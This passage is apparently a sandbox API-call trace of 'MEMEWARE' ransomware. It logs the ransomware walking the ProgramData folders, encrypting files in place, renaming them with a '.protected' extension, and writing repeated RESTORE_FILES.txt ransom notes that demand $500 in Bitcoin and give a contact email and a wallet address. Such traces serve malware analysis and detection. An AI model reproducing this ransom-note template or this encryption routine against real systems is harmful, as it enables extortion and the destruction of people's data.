lpFindFileData=0x295ef20) returned 1 [0072.051] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0072.051] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0072.051] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0072.051] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0072.051] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0072.051] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\..") returned 56 [0072.051] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.051] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.051] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0072.051] lstrcmpiW (lpString1="MPLog-07132009-221054.log", lpString2="Windows") returned -1 [0072.051] lstrcmpiW (lpString1="MPLog-07132009-221054.log", lpString2="Program Files") returned -1 [0072.051] lstrcmpiW (lpString1="MPLog-07132009-221054.log", lpString2="Program Files (x86)") returned -1 [0072.051] lstrcmpiW (lpString1="MPLog-07132009-221054.log", lpString2="$Recycle.bin") returned 1 [0072.051] lstrcmpiW (lpString1="MPLog-07132009-221054.log", lpString2="System Volume Information") returned -1 [0072.051] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MPLog-07132009-221054.log") returned 79 [0072.051] StrStrIW (lpFirst="MPLog-07132009-221054.log", lpSrch=".protected") returned 0x0 [0072.051] lstrcmpW (lpString1="MPLog-07132009-221054.log", lpString2="RESTORE_FILES.txt") returned -1 [0072.051] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0072.051] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, 
dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0072.051] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MPLog-07132009-221054.log" (normalized: "c:\\programdata\\microsoft\\windows defender\\support\\mplog-07132009-221054.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0072.051] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MPLog-07132009-221054.log") returned 79 [0072.051] StrStrW (lpFirst="MPLog-07132009-221054.log", lpSrch=".txt") returned 0x0 [0072.051] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MPLog-07132009-221054.log") returned 79 [0072.051] StrStrW (lpFirst="MPLog-07132009-221054.log", lpSrch=".rar") returned 0x0 [0072.051] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MPLog-07132009-221054.log") returned 79 [0072.051] StrStrW (lpFirst="MPLog-07132009-221054.log", lpSrch=".zip") returned 0x0 [0072.052] ReadFile (in: hFile=0xd4, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0072.071] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.071] WriteFile (in: hFile=0xd4, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0072.072] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.072] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, 
lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0072.076] WriteFile (in: hFile=0xd4, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0072.076] CloseHandle (hObject=0xd4) returned 1 [0072.076] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MPLog-07132009-221054.log.protected") returned 89 [0072.076] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MPLog-07132009-221054.log" (normalized: "c:\\programdata\\microsoft\\windows defender\\support\\mplog-07132009-221054.log"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MPLog-07132009-221054.log.protected" (normalized: "c:\\programdata\\microsoft\\windows defender\\support\\mplog-07132009-221054.log.protected")) returned 1 [0072.077] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0072.077] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0072.077] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\RESTORE_FILES.txt") returned 71 [0072.077] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\windows defender\\support\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0072.077] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0072.077] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0072.078] lstrlenA (lpString="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") returned 684 [0072.078] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0072.078] 
lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0072.078] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0072.078] CloseHandle (hObject=0xb4) returned 1 [0072.078] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0072.078] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0072.078] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\RESTORE_FILES.txt") returned 63 [0072.078] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\windows defender\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0072.079] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0072.079] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0072.080] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0072.080] WriteFile (in: hFile=0xa4, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0072.080] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0072.080] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0072.080] CloseHandle (hObject=0xa4) returned 1 [0072.080] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.080] lstrcmpiW (lpString1="Windows NT", lpString2="Windows") returned 1 [0072.080] lstrcmpiW (lpString1="Windows NT", lpString2="Program Files") returned 1 [0072.080] lstrcmpiW (lpString1="Windows NT", lpString2="Program Files (x86)") returned 1 [0072.080] lstrcmpiW (lpString1="Windows NT", lpString2="$Recycle.bin") returned 1 [0072.080] lstrcmpiW (lpString1="Windows NT", lpString2="System Volume Information") returned 1 [0072.080] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT") returned 39 [0072.080] lstrcmpW (lpString1="Windows NT", lpString2=".") returned 1 [0072.080] lstrcmpW (lpString1="Windows NT", lpString2="..") returned 1 [0072.081] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\*") returned 41 [0072.081] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b7a8 [0072.081] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0072.081] lstrcmpiW (lpString1=".", 
lpString2="Program Files") returned -1 [0072.081] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0072.081] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0072.081] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0072.081] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\.") returned 41 [0072.081] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.081] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0072.081] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0072.081] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0072.081] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0072.081] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0072.081] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0072.081] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\..") returned 42 [0072.081] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.081] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.081] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0072.081] lstrcmpiW (lpString1="MSFax", lpString2="Windows") returned -1 [0072.081] lstrcmpiW (lpString1="MSFax", lpString2="Program Files") returned -1 [0072.081] lstrcmpiW (lpString1="MSFax", lpString2="Program Files (x86)") returned -1 [0072.081] lstrcmpiW (lpString1="MSFax", lpString2="$Recycle.bin") returned 1 [0072.081] lstrcmpiW (lpString1="MSFax", lpString2="System Volume Information") returned -1 [0072.081] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax") returned 45 [0072.081] 
lstrcmpW (lpString1="MSFax", lpString2=".") returned 1 [0072.081] lstrcmpW (lpString1="MSFax", lpString2="..") returned 1 [0072.081] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\*") returned 47 [0072.081] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x447c80 [0072.084] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0072.084] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0072.084] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0072.084] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0072.084] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0072.084] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\.") returned 47 [0072.084] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.084] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0072.085] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0072.085] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0072.085] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0072.085] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0072.085] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0072.085] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\..") returned 48 [0072.085] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.085] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.085] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 
[0072.085] lstrcmpiW (lpString1="ActivityLog", lpString2="Windows") returned -1 [0072.085] lstrcmpiW (lpString1="ActivityLog", lpString2="Program Files") returned -1 [0072.085] lstrcmpiW (lpString1="ActivityLog", lpString2="Program Files (x86)") returned -1 [0072.085] lstrcmpiW (lpString1="ActivityLog", lpString2="$Recycle.bin") returned 1 [0072.085] lstrcmpiW (lpString1="ActivityLog", lpString2="System Volume Information") returned -1 [0072.085] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\ActivityLog") returned 57 [0072.085] lstrcmpW (lpString1="ActivityLog", lpString2=".") returned 1 [0072.085] lstrcmpW (lpString1="ActivityLog", lpString2="..") returned 1 [0072.085] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\*") returned 59 [0072.085] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447cc0 [0072.085] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0072.085] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0072.085] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0072.085] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0072.085] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0072.085] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\.") returned 59 [0072.085] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.085] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0072.085] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0072.085] lstrcmpiW (lpString1="..", lpString2="Program 
Files") returned -1 [0072.085] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0072.085] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0072.085] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0072.085] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\..") returned 60 [0072.086] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.086] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.086] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0072.086] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0072.086] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\RESTORE_FILES.txt") returned 75 [0072.086] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\activitylog\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0072.086] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0072.086] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0072.087] lstrlenA (lpString="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") returned 684 [0072.087] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0072.087] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0072.087] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, 
lpOverlapped=0x0) returned 1 [0072.087] CloseHandle (hObject=0xd4) returned 1 [0072.087] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0072.087] lstrcmpiW (lpString1="Common Coverpages", lpString2="Windows") returned -1 [0072.087] lstrcmpiW (lpString1="Common Coverpages", lpString2="Program Files") returned -1 [0072.087] lstrcmpiW (lpString1="Common Coverpages", lpString2="Program Files (x86)") returned -1 [0072.087] lstrcmpiW (lpString1="Common Coverpages", lpString2="$Recycle.bin") returned 1 [0072.087] lstrcmpiW (lpString1="Common Coverpages", lpString2="System Volume Information") returned -1 [0072.087] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages") returned 63 [0072.087] lstrcmpW (lpString1="Common Coverpages", lpString2=".") returned 1 [0072.087] lstrcmpW (lpString1="Common Coverpages", lpString2="..") returned 1 [0072.087] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\*") returned 65 [0072.087] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447cc0 [0072.087] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0072.087] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0072.087] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0072.087] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0072.088] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0072.088] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\.") returned 65 [0072.088] lstrcmpW (lpString1=".", lpString2=".") 
returned 0 [0072.088] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0072.088] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0072.088] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0072.088] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0072.088] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0072.088] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0072.088] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\..") returned 66 [0072.088] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.088] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.088] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0072.088] lstrcmpiW (lpString1="en-US", lpString2="Windows") returned -1 [0072.088] lstrcmpiW (lpString1="en-US", lpString2="Program Files") returned -1 [0072.088] lstrcmpiW (lpString1="en-US", lpString2="Program Files (x86)") returned -1 [0072.088] lstrcmpiW (lpString1="en-US", lpString2="$Recycle.bin") returned 1 [0072.088] lstrcmpiW (lpString1="en-US", lpString2="System Volume Information") returned -1 [0072.088] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US") returned 69 [0072.088] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0072.088] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0072.089] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\*") returned 71 [0072.089] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\*", 
